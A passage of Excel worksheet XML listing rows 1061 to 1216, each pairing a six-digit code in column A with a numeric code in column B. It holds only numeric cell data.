    <row r="1061" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1061" s="5">
        <v>500046</v>
      </c>
      <c r="B1061" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="1062" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1062" s="5">
        <v>500046</v>
      </c>
      <c r="B1062" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="1063" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1063" s="5">
        <v>500046</v>
      </c>
      <c r="B1063" s="3">
        <v>901125</v>
      </c>
    </row>
    <row r="1064" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1064" s="5">
        <v>500046</v>
      </c>
      <c r="B1064" s="3">
        <v>901497.00199999998</v>
      </c>
    </row>
    <row r="1065" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1065" s="5">
        <v>500046</v>
      </c>
      <c r="B1065" s="3">
        <v>901102.00199999998</v>
      </c>
    </row>
    <row r="1066" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1066" s="5">
        <v>500046</v>
      </c>
      <c r="B1066" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="1067" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1067" s="5">
        <v>500061</v>
      </c>
      <c r="B1067" s="3">
        <v>901134.00100000005</v>
      </c>
    </row>
    <row r="1068" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1068" s="5">
        <v>500061</v>
      </c>
      <c r="B1068" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="1069" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1069" s="5">
        <v>500061</v>
      </c>
      <c r="B1069" s="3">
        <v>901560.00100000005</v>
      </c>
    </row>
    <row r="1070" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1070" s="5">
        <v>500061</v>
      </c>
      <c r="B1070" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="1071" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1071" s="5">
        <v>500061</v>
      </c>
      <c r="B1071" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="1072" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1072" s="5">
        <v>500061</v>
      </c>
      <c r="B1072" s="3">
        <v>901074.00199999998</v>
      </c>
    </row>
    <row r="1073" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1073" s="5">
        <v>500061</v>
      </c>
      <c r="B1073" s="3">
        <v>901482</v>
      </c>
    </row>
    <row r="1074" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1074" s="5">
        <v>500061</v>
      </c>
      <c r="B1074" s="3">
        <v>901573.00199999998</v>
      </c>
    </row>
    <row r="1075" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1075" s="5">
        <v>500061</v>
      </c>
      <c r="B1075" s="3">
        <v>901546.00300000003</v>
      </c>
    </row>
    <row r="1076" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1076" s="5">
        <v>500061</v>
      </c>
      <c r="B1076" s="3">
        <v>901048.00300000003</v>
      </c>
    </row>
    <row r="1077" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1077" s="5">
        <v>500061</v>
      </c>
      <c r="B1077" s="3">
        <v>901068</v>
      </c>
    </row>
    <row r="1078" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1078" s="5">
        <v>500061</v>
      </c>
      <c r="B1078" s="3">
        <v>901070.00100000005</v>
      </c>
    </row>
    <row r="1079" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1079" s="5">
        <v>500061</v>
      </c>
      <c r="B1079" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="1080" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1080" s="5">
        <v>500061</v>
      </c>
      <c r="B1080" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="1081" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1081" s="5">
        <v>500061</v>
      </c>
      <c r="B1081" s="3">
        <v>901112</v>
      </c>
    </row>
    <row r="1082" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1082" s="5">
        <v>500061</v>
      </c>
      <c r="B1082" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1083" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1083" s="5">
        <v>500061</v>
      </c>
      <c r="B1083" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="1084" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1084" s="5">
        <v>500061</v>
      </c>
      <c r="B1084" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="1085" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1085" s="5">
        <v>500061</v>
      </c>
      <c r="B1085" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="1086" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1086" s="5">
        <v>500061</v>
      </c>
      <c r="B1086" s="3">
        <v>901055.00399999996</v>
      </c>
    </row>
    <row r="1087" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1087" s="5">
        <v>500061</v>
      </c>
      <c r="B1087" s="3">
        <v>901021.00100000005</v>
      </c>
    </row>
    <row r="1088" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1088" s="5">
        <v>500061</v>
      </c>
      <c r="B1088" s="3">
        <v>901021.00199999998</v>
      </c>
    </row>
    <row r="1089" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1089" s="5">
        <v>500061</v>
      </c>
      <c r="B1089" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="1090" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1090" s="5">
        <v>500061</v>
      </c>
      <c r="B1090" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="1091" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1091" s="5">
        <v>500061</v>
      </c>
      <c r="B1091" s="3">
        <v>901518.00100000005</v>
      </c>
    </row>
    <row r="1092" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1092" s="5">
        <v>500061</v>
      </c>
      <c r="B1092" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="1093" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1093" s="5">
        <v>500061</v>
      </c>
      <c r="B1093" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="1094" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1094" s="5">
        <v>500061</v>
      </c>
      <c r="B1094" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="1095" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1095" s="5">
        <v>500061</v>
      </c>
      <c r="B1095" s="3">
        <v>901102</v>
      </c>
    </row>
    <row r="1096" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1096" s="5">
        <v>500061</v>
      </c>
      <c r="B1096" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="1097" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1097" s="5">
        <v>500117</v>
      </c>
      <c r="B1097" s="3">
        <v>901087.00100000005</v>
      </c>
    </row>
    <row r="1098" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1098" s="5">
        <v>500117</v>
      </c>
      <c r="B1098" s="3">
        <v>901087.00199999998</v>
      </c>
    </row>
    <row r="1099" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1099" s="5">
        <v>500117</v>
      </c>
      <c r="B1099" s="3">
        <v>901560.00100000005</v>
      </c>
    </row>
    <row r="1100" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1100" s="5">
        <v>500117</v>
      </c>
      <c r="B1100" s="3">
        <v>901217</v>
      </c>
    </row>
    <row r="1101" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1101" s="5">
        <v>500117</v>
      </c>
      <c r="B1101" s="3">
        <v>901110</v>
      </c>
    </row>
    <row r="1102" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1102" s="5">
        <v>500117</v>
      </c>
      <c r="B1102" s="3">
        <v>901059</v>
      </c>
    </row>
    <row r="1103" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1103" s="5">
        <v>500117</v>
      </c>
      <c r="B1103" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="1104" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1104" s="5">
        <v>500117</v>
      </c>
      <c r="B1104" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="1105" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1105" s="5">
        <v>500117</v>
      </c>
      <c r="B1105" s="3">
        <v>901136.00100000005</v>
      </c>
    </row>
    <row r="1106" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1106" s="5">
        <v>500117</v>
      </c>
      <c r="B1106" s="3">
        <v>901555.005</v>
      </c>
    </row>
    <row r="1107" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1107" s="5">
        <v>500117</v>
      </c>
      <c r="B1107" s="3">
        <v>901530</v>
      </c>
    </row>
    <row r="1108" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1108" s="5">
        <v>500117</v>
      </c>
      <c r="B1108" s="3">
        <v>901213</v>
      </c>
    </row>
    <row r="1109" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1109" s="5">
        <v>500117</v>
      </c>
      <c r="B1109" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="1110" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1110" s="5">
        <v>500117</v>
      </c>
      <c r="B1110" s="3">
        <v>901039</v>
      </c>
    </row>
    <row r="1111" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1111" s="5">
        <v>500117</v>
      </c>
      <c r="B1111" s="3">
        <v>901585</v>
      </c>
    </row>
    <row r="1112" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1112" s="5">
        <v>500117</v>
      </c>
      <c r="B1112" s="3">
        <v>901585.00100000005</v>
      </c>
    </row>
    <row r="1113" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1113" s="5">
        <v>500117</v>
      </c>
      <c r="B1113" s="3">
        <v>901546.00800000003</v>
      </c>
    </row>
    <row r="1114" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1114" s="5">
        <v>500117</v>
      </c>
      <c r="B1114" s="3">
        <v>901190</v>
      </c>
    </row>
    <row r="1115" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1115" s="5">
        <v>500117</v>
      </c>
      <c r="B1115" s="3">
        <v>901210</v>
      </c>
    </row>
    <row r="1116" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1116" s="5">
        <v>500117</v>
      </c>
      <c r="B1116" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="1117" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1117" s="5">
        <v>500117</v>
      </c>
      <c r="B1117" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="1118" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1118" s="5">
        <v>500117</v>
      </c>
      <c r="B1118" s="3">
        <v>901036.00399999996</v>
      </c>
    </row>
    <row r="1119" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1119" s="5">
        <v>500117</v>
      </c>
      <c r="B1119" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="1120" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1120" s="5">
        <v>500117</v>
      </c>
      <c r="B1120" s="3">
        <v>901046</v>
      </c>
    </row>
    <row r="1121" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1121" s="5">
        <v>500117</v>
      </c>
      <c r="B1121" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1122" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1122" s="5">
        <v>500117</v>
      </c>
      <c r="B1122" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="1123" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1123" s="5">
        <v>500117</v>
      </c>
      <c r="B1123" s="3">
        <v>901003.00300000003</v>
      </c>
    </row>
    <row r="1124" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1124" s="5">
        <v>500117</v>
      </c>
      <c r="B1124" s="3">
        <v>901572</v>
      </c>
    </row>
    <row r="1125" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1125" s="5">
        <v>500117</v>
      </c>
      <c r="B1125" s="3">
        <v>901090</v>
      </c>
    </row>
    <row r="1126" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1126" s="5">
        <v>500117</v>
      </c>
      <c r="B1126" s="3">
        <v>901012</v>
      </c>
    </row>
    <row r="1127" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1127" s="5">
        <v>500117</v>
      </c>
      <c r="B1127" s="3">
        <v>901021.00100000005</v>
      </c>
    </row>
    <row r="1128" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1128" s="5">
        <v>500117</v>
      </c>
      <c r="B1128" s="3">
        <v>901021.00199999998</v>
      </c>
    </row>
    <row r="1129" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1129" s="5">
        <v>500117</v>
      </c>
      <c r="B1129" s="3">
        <v>901021.00399999996</v>
      </c>
    </row>
    <row r="1130" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1130" s="5">
        <v>500117</v>
      </c>
      <c r="B1130" s="3">
        <v>901021.005</v>
      </c>
    </row>
    <row r="1131" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1131" s="5">
        <v>500117</v>
      </c>
      <c r="B1131" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="1132" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1132" s="5">
        <v>500117</v>
      </c>
      <c r="B1132" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="1133" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1133" s="5">
        <v>500117</v>
      </c>
      <c r="B1133" s="3">
        <v>901505.00300000003</v>
      </c>
    </row>
    <row r="1134" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1134" s="5">
        <v>500117</v>
      </c>
      <c r="B1134" s="3">
        <v>901552.00100000005</v>
      </c>
    </row>
    <row r="1135" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1135" s="5">
        <v>500117</v>
      </c>
      <c r="B1135" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="1136" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1136" s="5">
        <v>500117</v>
      </c>
      <c r="B1136" s="3">
        <v>901102</v>
      </c>
    </row>
    <row r="1137" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1137" s="5">
        <v>500101</v>
      </c>
      <c r="B1137" s="3">
        <v>901119</v>
      </c>
    </row>
    <row r="1138" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1138" s="5">
        <v>500101</v>
      </c>
      <c r="B1138" s="3">
        <v>901020</v>
      </c>
    </row>
    <row r="1139" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1139" s="5">
        <v>500101</v>
      </c>
      <c r="B1139" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="1140" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1140" s="5">
        <v>500101</v>
      </c>
      <c r="B1140" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="1141" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1141" s="5">
        <v>500101</v>
      </c>
      <c r="B1141" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="1142" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1142" s="5">
        <v>500101</v>
      </c>
      <c r="B1142" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="1143" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1143" s="5">
        <v>500101</v>
      </c>
      <c r="B1143" s="3">
        <v>901140</v>
      </c>
    </row>
    <row r="1144" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1144" s="5">
        <v>500101</v>
      </c>
      <c r="B1144" s="3">
        <v>901573.00100000005</v>
      </c>
    </row>
    <row r="1145" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1145" s="5">
        <v>500101</v>
      </c>
      <c r="B1145" s="3">
        <v>901041</v>
      </c>
    </row>
    <row r="1146" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1146" s="5">
        <v>500101</v>
      </c>
      <c r="B1146" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="1147" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1147" s="5">
        <v>500101</v>
      </c>
      <c r="B1147" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="1148" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1148" s="5">
        <v>500101</v>
      </c>
      <c r="B1148" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1149" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1149" s="5">
        <v>500101</v>
      </c>
      <c r="B1149" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="1150" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1150" s="5">
        <v>500101</v>
      </c>
      <c r="B1150" s="3">
        <v>901003</v>
      </c>
    </row>
    <row r="1151" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1151" s="5">
        <v>500101</v>
      </c>
      <c r="B1151" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="1152" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1152" s="5">
        <v>500101</v>
      </c>
      <c r="B1152" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="1153" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1153" s="5">
        <v>500101</v>
      </c>
      <c r="B1153" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="1154" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1154" s="5">
        <v>500101</v>
      </c>
      <c r="B1154" s="3">
        <v>901518.00100000005</v>
      </c>
    </row>
    <row r="1155" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1155" s="5">
        <v>500101</v>
      </c>
      <c r="B1155" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="1156" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1156" s="5">
        <v>500101</v>
      </c>
      <c r="B1156" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="1157" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1157" s="5">
        <v>500101</v>
      </c>
      <c r="B1157" s="3">
        <v>901033</v>
      </c>
    </row>
    <row r="1158" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1158" s="5">
        <v>500101</v>
      </c>
      <c r="B1158" s="3">
        <v>901221</v>
      </c>
    </row>
    <row r="1159" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1159" s="5">
        <v>500101</v>
      </c>
      <c r="B1159" s="3">
        <v>901127.00100000005</v>
      </c>
    </row>
    <row r="1160" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1160" s="5">
        <v>500101</v>
      </c>
      <c r="B1160" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="1161" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1161" s="5">
        <v>500101</v>
      </c>
      <c r="B1161" s="3">
        <v>901497.00100000005</v>
      </c>
    </row>
    <row r="1162" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1162" s="5">
        <v>500101</v>
      </c>
      <c r="B1162" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="1163" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1163" s="5">
        <v>500093</v>
      </c>
      <c r="B1163" s="3">
        <v>901583.00399999996</v>
      </c>
    </row>
    <row r="1164" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1164" s="5">
        <v>500093</v>
      </c>
      <c r="B1164" s="3">
        <v>901560.00100000005</v>
      </c>
    </row>
    <row r="1165" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1165" s="5">
        <v>500093</v>
      </c>
      <c r="B1165" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="1166" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1166" s="5">
        <v>500093</v>
      </c>
      <c r="B1166" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="1167" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1167" s="5">
        <v>500093</v>
      </c>
      <c r="B1167" s="3">
        <v>901136.00199999998</v>
      </c>
    </row>
    <row r="1168" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1168" s="5">
        <v>500093</v>
      </c>
      <c r="B1168" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="1169" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1169" s="5">
        <v>500093</v>
      </c>
      <c r="B1169" s="3">
        <v>901074.00100000005</v>
      </c>
    </row>
    <row r="1170" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1170" s="5">
        <v>500093</v>
      </c>
      <c r="B1170" s="3">
        <v>901041</v>
      </c>
    </row>
    <row r="1171" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1171" s="5">
        <v>500093</v>
      </c>
      <c r="B1171" s="3">
        <v>901190</v>
      </c>
    </row>
    <row r="1172" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1172" s="5">
        <v>500093</v>
      </c>
      <c r="B1172" s="3">
        <v>901133</v>
      </c>
    </row>
    <row r="1173" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1173" s="5">
        <v>500093</v>
      </c>
      <c r="B1173" s="3">
        <v>901574.00199999998</v>
      </c>
    </row>
    <row r="1174" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1174" s="5">
        <v>500093</v>
      </c>
      <c r="B1174" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="1175" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1175" s="5">
        <v>500093</v>
      </c>
      <c r="B1175" s="3">
        <v>901570</v>
      </c>
    </row>
    <row r="1176" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1176" s="5">
        <v>500093</v>
      </c>
      <c r="B1176" s="3">
        <v>901036.00300000003</v>
      </c>
    </row>
    <row r="1177" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1177" s="5">
        <v>500093</v>
      </c>
      <c r="B1177" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1178" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1178" s="5">
        <v>500093</v>
      </c>
      <c r="B1178" s="3">
        <v>901027.00199999998</v>
      </c>
    </row>
    <row r="1179" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1179" s="5">
        <v>500093</v>
      </c>
      <c r="B1179" s="3">
        <v>901027.005</v>
      </c>
    </row>
    <row r="1180" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1180" s="5">
        <v>500093</v>
      </c>
      <c r="B1180" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="1181" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1181" s="5">
        <v>500093</v>
      </c>
      <c r="B1181" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="1182" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1182" s="5">
        <v>500093</v>
      </c>
      <c r="B1182" s="3">
        <v>901003.00199999998</v>
      </c>
    </row>
    <row r="1183" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1183" s="5">
        <v>500093</v>
      </c>
      <c r="B1183" s="3">
        <v>901090.00199999998</v>
      </c>
    </row>
    <row r="1184" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1184" s="5">
        <v>500093</v>
      </c>
      <c r="B1184" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="1185" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1185" s="5">
        <v>500093</v>
      </c>
      <c r="B1185" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="1186" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1186" s="5">
        <v>500093</v>
      </c>
      <c r="B1186" s="3">
        <v>901505.00300000003</v>
      </c>
    </row>
    <row r="1187" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1187" s="5">
        <v>500093</v>
      </c>
      <c r="B1187" s="3">
        <v>901553.00199999998</v>
      </c>
    </row>
    <row r="1188" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1188" s="5">
        <v>500093</v>
      </c>
      <c r="B1188" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="1189" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1189" s="5">
        <v>500093</v>
      </c>
      <c r="B1189" s="3">
        <v>901049</v>
      </c>
    </row>
    <row r="1190" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1190" s="5">
        <v>500093</v>
      </c>
      <c r="B1190" s="3">
        <v>901033</v>
      </c>
    </row>
    <row r="1191" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1191" s="5">
        <v>500093</v>
      </c>
      <c r="B1191" s="3">
        <v>901550.00199999998</v>
      </c>
    </row>
    <row r="1192" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1192" s="5">
        <v>500093</v>
      </c>
      <c r="B1192" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="1193" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1193" s="5">
        <v>500093</v>
      </c>
      <c r="B1193" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="1194" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1194" s="5">
        <v>500084</v>
      </c>
      <c r="B1194" s="3">
        <v>901560.00100000005</v>
      </c>
    </row>
    <row r="1195" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1195" s="5">
        <v>500084</v>
      </c>
      <c r="B1195" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="1196" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1196" s="5">
        <v>500084</v>
      </c>
      <c r="B1196" s="3">
        <v>901559.00199999998</v>
      </c>
    </row>
    <row r="1197" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1197" s="5">
        <v>500084</v>
      </c>
      <c r="B1197" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1198" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1198" s="5">
        <v>500084</v>
      </c>
      <c r="B1198" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="1199" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1199" s="5">
        <v>500084</v>
      </c>
      <c r="B1199" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="1200" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1200" s="5">
        <v>500047</v>
      </c>
      <c r="B1200" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="1201" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1201" s="5">
        <v>500047</v>
      </c>
      <c r="B1201" s="3">
        <v>901119</v>
      </c>
    </row>
    <row r="1202" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1202" s="5">
        <v>500047</v>
      </c>
      <c r="B1202" s="3">
        <v>901020</v>
      </c>
    </row>
    <row r="1203" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1203" s="5">
        <v>500047</v>
      </c>
      <c r="B1203" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="1204" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1204" s="5">
        <v>500047</v>
      </c>
      <c r="B1204" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="1205" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1205" s="5">
        <v>500047</v>
      </c>
      <c r="B1205" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="1206" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1206" s="5">
        <v>500047</v>
      </c>
      <c r="B1206" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="1207" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1207" s="5">
        <v>500047</v>
      </c>
      <c r="B1207" s="3">
        <v>901039</v>
      </c>
    </row>
    <row r="1208" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1208" s="5">
        <v>500047</v>
      </c>
      <c r="B1208" s="3">
        <v>901025</v>
      </c>
    </row>
    <row r="1209" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1209" s="5">
        <v>500047</v>
      </c>
      <c r="B1209" s="3">
        <v>901140</v>
      </c>
    </row>
    <row r="1210" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1210" s="5">
        <v>500047</v>
      </c>
      <c r="B1210" s="3">
        <v>901041</v>
      </c>
    </row>
    <row r="1211" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1211" s="5">
        <v>500047</v>
      </c>
      <c r="B1211" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="1212" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1212" s="5">
        <v>500047</v>
      </c>
      <c r="B1212" s="3">
        <v>901562.00100000005</v>
      </c>
    </row>
    <row r="1213" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1213" s="5">
        <v>500047</v>
      </c>
      <c r="B1213" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="1214" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1214" s="5">
        <v>500047</v>
      </c>
      <c r="B1214" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="1215" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1215" s="5">
        <v>500047</v>
      </c>
      <c r="B1215" s="3">
        <v>901559</v>
      </c>
    </row>
    <row r="1216" spans="1:2" x14ac:dyDescent="0.25">
